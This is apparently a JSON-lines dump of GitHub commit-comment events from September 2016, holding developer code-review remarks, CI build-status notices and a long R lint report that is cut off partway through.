{"id":"4602724977","type":"CommitCommentEvent","actor":{"login":"amahoola"},"repo":{"name":"unansweredocd/Portfolio"},"payload":{"comment":{"id":19130927,"position":44,"line":68,"path":"src/index.php","commit_id":"5315178d709c4ae43d48f3f1cf1456ef982dbb26","created_at":"2016-09-22T14:16:01Z","updated_at":"2016-09-22T14:16:01Z","body":"This script is at the end of your page and it's asynchronous. Using asynchronous at the end of a page is totally useless. If you don't want to interrupt the parser you should just put your script in the header and use async. If your script is dependent on the DOM you should use deferred (defer). This way the script is downloaden without interrupting the parser but executed when the DOM is completed.\r\n\r\nInfo: https://css-tricks.com/async-attribute-scripts-bottom/"}},"created_at":"2016-09-22T14:16:01Z"}
{"id":"4602727107","type":"CommitCommentEvent","actor":{"login":"FPTeixeira"},"repo":{"name":"stone-pagamentos/UGUI"},"payload":{"comment":{"id":19130932,"position":14,"line":1705,"path":"ugui.c","commit_id":"3b2c5070c2bda75a37dec6c4bb67071d754c9552","created_at":"2016-09-22T14:16:21Z","updated_at":"2016-09-22T14:16:21Z","body":"Safo!"}},"created_at":"2016-09-22T14:16:21Z"}
{"id":"4602732333","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19130945,"position":null,"line":null,"path":null,"commit_id":"823996dc22173e764b267c5999248f927212388a","created_at":"2016-09-22T14:17:10Z","updated_at":"2016-09-22T14:17:10Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.83](http://build.prxm.it:8813/viewLog.html?buildId=3680&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:30"}},"created_at":"2016-09-22T14:17:10Z"}
{"id":"4602732343","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19130946,"position":null,"line":null,"path":null,"commit_id":"823996dc22173e764b267c5999248f927212388a","created_at":"2016-09-22T14:17:11Z","updated_at":"2016-09-22T14:17:11Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.83](http://build.prxm.it:8813/viewLog.html?buildId=3680&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:30"}},"created_at":"2016-09-22T14:17:11Z"}
{"id":"4602733265","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19130950,"position":null,"line":null,"path":null,"commit_id":"842606b3fc7815ff50fb0c6ecb91716f9b5185db","created_at":"2016-09-22T14:17:19Z","updated_at":"2016-09-22T14:17:19Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1785 of 1785 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T14:17:19Z"}
{"id":"4602734625","type":"CommitCommentEvent","actor":{"login":"CLOU-Official"},"repo":{"name":"CLOU-Official/CLOU-Webbrowser"},"payload":{"comment":{"id":19130953,"position":1,"line":1,"path":"README.md","commit_id":"922dfcefd666cb04d8c6b85b59902d908d0a9ecb","created_at":"2016-09-22T14:17:32Z","updated_at":"2016-09-22T14:17:32Z","body":"The CLOU Browser is a new, fast WebBrowser for Windows 10. It is a great alternative for Mozilla Firefox, Google Chrome or Microsoft Edge."}},"created_at":"2016-09-22T14:17:32Z"}
{"id":"4602736418","type":"CommitCommentEvent","actor":{"login":"chantalgo"},"repo":{"name":"snowplow/iglu-central"},"payload":{"comment":{"id":19130955,"position":null,"line":null,"path":null,"commit_id":"d4061326cb0642b5ad7458988bca78709e6f1140","created_at":"2016-09-22T14:17:48Z","updated_at":"2016-09-22T14:17:48Z","body":"Additional to the encrypted ID,  we also have an optout value (true/false) "}},"created_at":"2016-09-22T14:17:48Z"}
{"id":"4602737533","type":"CommitCommentEvent","actor":{"login":"jarias"},"repo":{"name":"stormpath/stormpath-sdk-java"},"payload":{"comment":{"id":19130959,"position":46,"line":33,"path":"extensions/httpclient/src/test/groovy/com/stormpath/sdk/impl/http/httpclient/HttpClientRequestExecutorIT.groovy","commit_id":"fafb0121cbf63e8336c8075bc32b4b4e011ab34a","created_at":"2016-09-22T14:17:59Z","updated_at":"2016-09-22T14:17:59Z","body":"Nice!!! I wonder why that always fail locally too, network latency is probably why it fails locally."}},"created_at":"2016-09-22T14:17:59Z"}
{"id":"4602738349","type":"CommitCommentEvent","actor":{"login":"andres-erbsen"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":19130963,"position":5,"line":4,"path":"src/Util/LockedLet.v","commit_id":"e9fb194f228321f9477a26bf18617047722fd42a","created_at":"2016-09-22T14:18:08Z","updated_at":"2016-09-22T14:18:08Z","body":"Why does this work? Also, \"beta-iota-delta to leave behind a zeta-redex\" does not seem to match the comment in the file (\"doesn't disappear under βδζ unless you also have ι \")."}},"created_at":"2016-09-22T14:18:08Z"}
{"id":"4602740265","type":"CommitCommentEvent","actor":{"login":"ArkhamKnight9103"},"repo":{"name":"ArkhamKnight9103/Random-Game"},"payload":{"comment":{"id":19130969,"position":1,"line":1,"path":"README.md","commit_id":"22664023a58e5348a23c9d98540a2c2292ea54a3","created_at":"2016-09-22T14:18:25Z","updated_at":"2016-09-22T14:18:25Z","body":"print(your mom)"}},"created_at":"2016-09-22T14:18:25Z"}
{"id":"4602741151","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19130974,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-22T14:18:34Z","updated_at":"2016-09-22T14:18:34Z","body":"done in 39889190acef305f402fe74ec1564a40fc6a7d72"}},"created_at":"2016-09-22T14:18:34Z"}
{"id":"4602742354","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19130976,"position":10,"line":32,"path":"src/httpserver/operator.clj","commit_id":"fe1b303fa825d859ff9c5a71d771948559ae78ea","created_at":"2016-09-22T14:18:45Z","updated_at":"2016-09-22T14:18:45Z","body":"If you extract a function here it should be clearer what the condition is. I'm a little confused - is router/routes a def or a defn?"}},"created_at":"2016-09-22T14:18:45Z"}
{"id":"4602744264","type":"CommitCommentEvent","actor":{"login":"helgatheviking"},"repo":{"name":"Charitable/Charitable"},"payload":{"comment":{"id":19130981,"position":24,"line":32,"path":"includes/emails/charitable-email-hooks.php","commit_id":"be9c45ab8c7f57daf53c03524fb7821567ab0c15","created_at":"2016-09-22T14:19:04Z","updated_at":"2016-09-22T14:19:04Z","body":"If you have lines 36 and 37 adding the actions for every approved status why do you also need this still?"}},"created_at":"2016-09-22T14:19:04Z"}
{"id":"4602744531","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19130982,"position":null,"line":null,"path":null,"commit_id":"1d429ecb7853c700f277d40bd146eede8b4e7cc3","created_at":"2016-09-22T14:19:07Z","updated_at":"2016-09-22T14:19:07Z","body":"Is there no way to do this with pure CSS? Is Javascript needed?"}},"created_at":"2016-09-22T14:19:07Z"}
{"id":"4602746108","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19130986,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-22T14:19:22Z","updated_at":"2016-09-22T14:19:22Z","body":"doesn't make much of a difference, does it?"}},"created_at":"2016-09-22T14:19:22Z"}
{"id":"4602746407","type":"CommitCommentEvent","actor":{"login":"chantalgo"},"repo":{"name":"snowplow/iglu-central"},"payload":{"comment":{"id":19130991,"position":null,"line":null,"path":null,"commit_id":"a288eace55eb4ea638a39376e39091a30b7fcea6","created_at":"2016-09-22T14:19:24Z","updated_at":"2016-09-22T14:19:24Z","body":"Additional to the decrypted ID, we also have an optout value (true/false) that needs to be added\r\n"}},"created_at":"2016-09-22T14:19:24Z"}
{"id":"4602748201","type":"CommitCommentEvent","actor":{"login":"tavaughan"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":19130995,"position":20,"line":456,"path":"PivotCalibration/Logic/vtkSlicerPivotCalibrationLogic.cxx","commit_id":"80106cce77376eb13399aa08d9da6ac862e8b532","created_at":"2016-09-22T14:19:41Z","updated_at":"2016-09-22T14:19:41Z","body":"Thank you @mholden8 - Let me know if I can do anything to help.\r\n\r\nIf I may suggest, it might be worth making the behaviour more obvious on the GUI, as well. Maybe through a tooltip or some text after \"Data collection will start and end after specified time.\""}},"created_at":"2016-09-22T14:19:41Z"}
{"id":"4602748221","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19130996,"position":null,"line":null,"path":null,"commit_id":"e85372ce89f14bde4395449e90e7582c49d3fbdc","created_at":"2016-09-22T14:19:41Z","updated_at":"2016-09-22T14:19:41Z","body":"TeamCity test :: test [Build 22](http://ci.lemmew.com:8111/viewLog.html?buildId=1641&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-22T14:19:41Z"}
{"id":"4602748582","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19130997,"position":null,"line":null,"path":null,"commit_id":"e85372ce89f14bde4395449e90e7582c49d3fbdc","created_at":"2016-09-22T14:19:45Z","updated_at":"2016-09-22T14:19:45Z","body":"TeamCity test :: test [Build 22](http://ci.lemmew.com:8111/viewLog.html?buildId=1641&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:03"}},"created_at":"2016-09-22T14:19:45Z"}
{"id":"4602752101","type":"CommitCommentEvent","actor":{"login":"baconrpatrick"},"repo":{"name":"baconrpatrick/_vimrc"},"payload":{"comment":{"id":19131009,"position":null,"line":null,"path":null,"commit_id":"2cf679cbb678257a98a66c7a79e02736573218d7","created_at":"2016-09-22T14:20:18Z","updated_at":"2016-09-22T14:20:18Z","body":"Reviewed changes associated with file encoding."}},"created_at":"2016-09-22T14:20:18Z"}
{"id":"4602756088","type":"CommitCommentEvent","actor":{"login":"MarthaTenney"},"repo":{"name":"MarthaTenney/icg_csv_import"},"payload":{"comment":{"id":19131015,"position":null,"line":null,"path":null,"commit_id":"3c60dab5de2a5ffa55b16e0001d617b66eb3caae","created_at":"2016-09-22T14:20:54Z","updated_at":"2016-09-22T14:20:54Z","body":"sorry--accidentally committed this rather than submitting a pull request. just updating the documentation to reflect Mark's changes to the code that allow multiple attributes with \"and\" syntax"}},"created_at":"2016-09-22T14:20:54Z"}
{"id":"4602756093","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19131016,"position":null,"line":null,"path":null,"commit_id":"842606b3fc7815ff50fb0c6ecb91716f9b5185db","created_at":"2016-09-22T14:20:54Z","updated_at":"2016-09-22T14:20:54Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T14:20:54Z"}
{"id":"4602757609","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19131019,"position":8,"line":820,"path":"cura/CuraApplication.py","commit_id":"4e3384e6406bd3eecf082e594080bd86d68b8234","created_at":"2016-09-22T14:21:09Z","updated_at":"2016-09-22T14:21:09Z","body":"We'll keep it for explicitness"}},"created_at":"2016-09-22T14:21:09Z"}
{"id":"4602762332","type":"CommitCommentEvent","actor":{"login":"iocanel"},"repo":{"name":"iocanel/arquillian-cube"},"payload":{"comment":{"id":19131032,"position":23,"line":29,"path":"kubernetes/kubernetes/src/main/java/org/arquillian/cube/kubernetes/impl/enricher/AbstractKubernetesResourceProvider.java","commit_id":"81bff2066c1abba4f5e63d97e48687aac563a002","created_at":"2016-09-22T14:21:55Z","updated_at":"2016-09-22T14:21:55Z","body":"I can live with that :-)\r\n"}},"created_at":"2016-09-22T14:21:55Z"}
{"id":"4602764558","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19131038,"position":null,"line":null,"path":null,"commit_id":"1be679740e539c06d54fc37985a9dc1a3481778c","created_at":"2016-09-22T14:22:15Z","updated_at":"2016-09-22T14:22:15Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S, N, I, theta, KDA) {\n^~~~~~~~~~~\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) - \n                ^\n```\n[R/Condition.R:23:49:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) - \n                                                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:59:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:61:18:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:61:54:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:74:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L74) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:75:19:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ check_left_x  <- evaluateCondLik(eps, theta_x, theta_y,\n                  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:77:19:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ check_right_x <- evaluateCondLik(1 - eps, theta_x, theta_y,\n                  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:82:16:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:90:16:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:98:15:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x, theta_x, theta_y,\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:120:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L120) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:125:54:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L125) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\") \n                                                     ^\n```\n[R/Condition.R:130:50:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L130) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\",\"\\n\")\n                                                 ^\n```\n[R/Condition.R:139:9:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:139:9:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L139) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:142:23:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:142:23:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L142) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:148:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:155:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L155) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:159:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L159) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:168:9:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L168) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:172:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L172) *style:* **Variable and function names should be all lowercase.**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:172:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L172) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:177:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L177) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:177:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L177) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:177:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L177) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:177:46:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L177) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n                                             ^~~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L181) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L181) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:182:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L182) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:182:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L182) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:203:17:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:211:10:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L211) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(initVals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:211:18:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- simplex(initVals, g, verbose)\n                 ^~~~~~~~\n```\n[R/Condition.R:212:4:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L212) *style:* **Trailing whitespace is superfluous.**\n```r\n​  } \n   ^\n```\n[R/Condition.R:214:10:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L214) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​    x <- subplex(initVals, g)\n         ^~~~~~~\n```\n[R/Condition.R:214:18:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/Condition.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- subplex(initVals, g)\n                 ^~~~~~~~\n```\n[R/drawLocal.R:2:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty = rep(0, length(x))\n^\n```\n[R/drawLocal.R:2:2:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n ^\n```\n[R/drawLocal.R:2:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n          ~^~~\n```\n[R/drawLocal.R:2:32:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                               ^~\n```\n[R/drawLocal.R:2:49:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                ^~\n```\n[R/drawLocal.R:2:59:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                         ~^~\n```\n[R/drawLocal.R:2:62:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                             